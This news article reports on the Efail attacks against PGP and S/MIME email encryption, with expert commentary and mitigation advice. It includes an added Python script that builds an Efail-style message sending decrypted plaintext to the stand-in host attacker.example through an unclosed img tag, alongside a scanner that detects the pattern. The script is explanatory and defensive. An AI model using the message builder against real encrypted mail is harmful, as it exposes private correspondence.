German and Belgian researchers have warned of attacks that break email encryption based on Pretty Good Privacy (PGP) and Secure/Multipurpose Internet Mail Extensions (S/MIME) by tricking email clients into sending the full plaintext of encrypted emails to the attacker.
PGP and S/MIME are used by organisations because they add a layer of end-to-end protection to email and, if used properly, are meant to guarantee the confidentiality and authenticity of messages even when an attacker has full access to the email account they pass through.
The researchers said “Efail” describes vulnerabilities in OpenPGP and S/MIME that leak the plaintext of encrypted emails.
One of the researchers, Sebastian Schinzel, who runs the IT security lab at the Münster University of Applied Sciences, tweeted: “There are currently no reliable fixes for the vulnerability. If you use PGP/GPG or S/MIME for very sensitive communication, you should disable it in your email client for now.”
The research also prompted the Electronic Frontier Foundation (EFF) to warn that encrypted messages sent in the past could be exposed through exploitation of the vulnerability, because a captured ciphertext can be re-sent to the recipient at any later time.
The EFF also advised users to stop using PGP/GPG (GNU Privacy Guard) encryption until the issues are more widely understood and fixed, providing links on how to disable PGP/GPG encryption plugins in email clients.
Users should arrange for the use of alternative end-to-end secure channels, such as Signal, the EFF said in a blog post.
In summary, the researchers said the Efail attacks abuse active content of HTML emails – for example, externally loaded images or styles – to exfiltrate plaintext through requested URLs.
While this sounds alarming, the researchers note that to create these exfiltration channels the attacker first needs a copy of the encrypted emails, obtained for example by eavesdropping on network traffic, or by compromising email accounts, email servers, backup systems or client computers.
The attacker then modifies or repackages the captured encrypted email, for example by wrapping it in HTML parts so that the decrypted text lands inside an image URL, and sends the result to the victim. The victim’s email client decrypts the email and loads the external content, and the request it makes carries the plaintext to the attacker’s server.
Overreaction to Efail attacks
While the attack is “sneaky”, independent security advisor Graham Cluley is one of several experts who have said the significance and severity of the Efail attacks have been overstated.
The researchers clearly state: “The Efail attacks require the attacker to have access to your S/MIME or PGP encrypted emails. You are thus only affected if an attacker already has access to your emails.”
This fact makes successful exploitation of these newly discovered vulnerabilities an unlikely risk, according to Cluley.
“If a malicious hacker already has access to your email servers, networks and such like, there’s probably all manner of worse and less convoluted things they could be doing to make your life a misery, steal secrets and destroy your privacy,” he wrote in a blog post.
Cluley also highlighted that because Efail attacks rely on previously captured encrypted emails being re-sent to the target, the attack is visible and obvious in the mailbox, and could be identified with a script that scans incoming email for malformed IMG tags.
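The following stand-alone script is an added example, not code from the article, the Efail researchers or any mail client. It models the three-part HTML wrapping described earlier, shows how a client that pastes every decrypted MIME part into one HTML document ends up requesting a URL containing the plaintext, and then implements the kind of incoming-mail check Cluley suggests. The attacker host, the ciphertext and the "decryption" (a lookup in a fake keyring) are constructed placeholders so the script runs offline with only the standard library.

```python
"""Added example: a model of Efail's direct-exfiltration wrapping and a scanner for it.
Attacker host, ciphertext and keyring below are constructed placeholders."""
import re
from email import message_from_string, policy

ATTACKER_HOST = "attacker.example"          # assumed attacker-controlled host (constructed)

# A real attack re-sends a genuine ciphertext the attacker captured earlier;
# here "decryption" is a lookup in a fake keyring so the script runs offline.
CAPTURED_CIPHERTEXT = "MIAGCSqGSIb3DQEHA6CAMIACAQAxggHX"   # placeholder, not a real S/MIME blob
FAKE_KEYRING = {CAPTURED_CIPHERTEXT: "Wire 40,000 EUR to IBAN DE00 1234 today"}

ENCRYPTED_TYPES = {"application/pkcs7-mime", "application/x-pkcs7-mime"}
BOUNDARY = "efail-example-boundary"


def build_message(parts):
    """Assemble a multipart/mixed message from (content-type, body) pairs."""
    body = "".join(f"--{BOUNDARY}\nContent-Type: {ctype}\n\n{content}\n" for ctype, content in parts)
    return ("From: attacker@example.com\nTo: victim@example.com\nSubject: Re: invoice\n"
            f'MIME-Version: 1.0\nContent-Type: multipart/mixed; boundary="{BOUNDARY}"\n\n'
            f"{body}--{BOUNDARY}--\n")


def build_efail_message(ciphertext):
    """The three parts the article describes: an HTML part that opens <img src="
    and never closes the quote, the untouched captured ciphertext, and an HTML
    part that closes the attribute and the tag."""
    return build_message([
        ("text/html", f'<img src="https://{ATTACKER_HOST}/'),
        ("application/pkcs7-mime; smime-type=enveloped-data", ciphertext),
        ("text/html", '">'),
    ])


def leaf_parts(raw):
    msg = message_from_string(raw, policy=policy.default)
    return [p for p in msg.walk() if not p.is_multipart()]


def part_text(part):
    return part.get_payload(decode=True).decode("utf-8", "replace").rstrip("\n")


def is_encrypted(part):
    return part.get_content_type() in ENCRYPTED_TYPES


def vulnerable_client_render(raw, keyring):
    """Model of the behaviour Efail abuses: every leaf part, including the freshly
    decrypted one, is pasted into one HTML document before it is rendered."""
    chunks = []
    for part in leaf_parts(raw):
        text = part_text(part)
        if is_encrypted(part):
            text = keyring.get(text.strip(), "[decryption failed]")
        chunks.append(text)
    return "".join(chunks)


IMG_SRC = re.compile(r'<img[^>]*\ssrc\s*=\s*"([^"]*)"', re.IGNORECASE)

def remote_requests(html):
    """URLs a renderer with remote content enabled would fetch. A real client
    percent-encodes the path, but the plaintext still reaches the attacker's server."""
    return IMG_SRC.findall(html)


# Detection: an HTML part that ends inside an open tag is almost never legitimate,
# and next to an encrypted part it is the signature of the wrapping trick above.
OPEN_TAG_AT_END = re.compile(r"<[A-Za-z][^>]*\Z", re.DOTALL)

def scan_for_efail(raw):
    """Return one finding per suspicious HTML part; an empty list means clean."""
    leaves = leaf_parts(raw)
    findings = []
    for i, part in enumerate(leaves):
        if part.get_content_type() != "text/html":
            continue
        html = part_text(part)
        neighbours = [leaves[j] for j in (i - 1, i + 1) if 0 <= j < len(leaves)]
        if OPEN_TAG_AT_END.search(html) and any(is_encrypted(n) for n in neighbours):
            findings.append(f"part {i}: HTML ends inside an open tag beside an encrypted part: {html[-40:]!r}")
    return findings


if __name__ == "__main__":
    raw = build_efail_message(CAPTURED_CIPHERTEXT)
    rendered = vulnerable_client_render(raw, FAKE_KEYRING)
    print("client would fetch:", remote_requests(rendered))
    print("scanner says:", scan_for_efail(raw) or "clean")
```

The scanner deliberately keys on structure (an HTML part that ends mid-tag next to an encrypted part) rather than on the attacker's hostname, so it does not need a blocklist; a client that simply never fetches remote content, as recommended later in the article, defeats the same message without any scanning at all.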
Cluley is among several security experts who have pointed out that Efail does not rely on any inherent weakness in the PGP/GPG implementation being used, because it exploits users who have not told their email clients to stop rendering remote or external content automatically.
Keep email patches up to date
The researchers have called for the MIME, S/MIME and OpenPGP standards to be updated, saying the Efail attacks exploit flaws and undefined behaviour in these standards.
Cluley also pointed out that it is not a new problem – the root problem of mail clients attempting to display corrupted S/MIME messages has been known about since 2000.
Efail is not a good reason for users of PGP/GPG to disable it entirely, according to Cluley. However, he does point out that there are alternative end-to-end encrypted messaging solutions that do not face the same challenges.
While Efail is not a reason to panic, organisations are advised to keep all email clients updated with the latest security patches. Cluley said organisations should also consider disabling the rendering of remote content until the issue is resolved, and turning off automatic decryption of incoming messages so that users must request decryption manually, which reduces the chance of plaintext leaking through active content.
The researchers said they disclosed their findings “responsibly” to international computer emergency response teams (CERTs), the GnuPG developers and the affected suppliers, which have applied (or are in the process of applying) countermeasures.
“Please note that, in general, these countermeasures are specific hotfixes and we cannot rule out that extended attacks with further backchannels or exfiltrations will be found,” they said.
The researchers also warned that even if all backchannels are closed, both standards remain vulnerable to attacks in which the attacker modifies email content or injects malicious code into attachments that get executed in a context beyond the email client.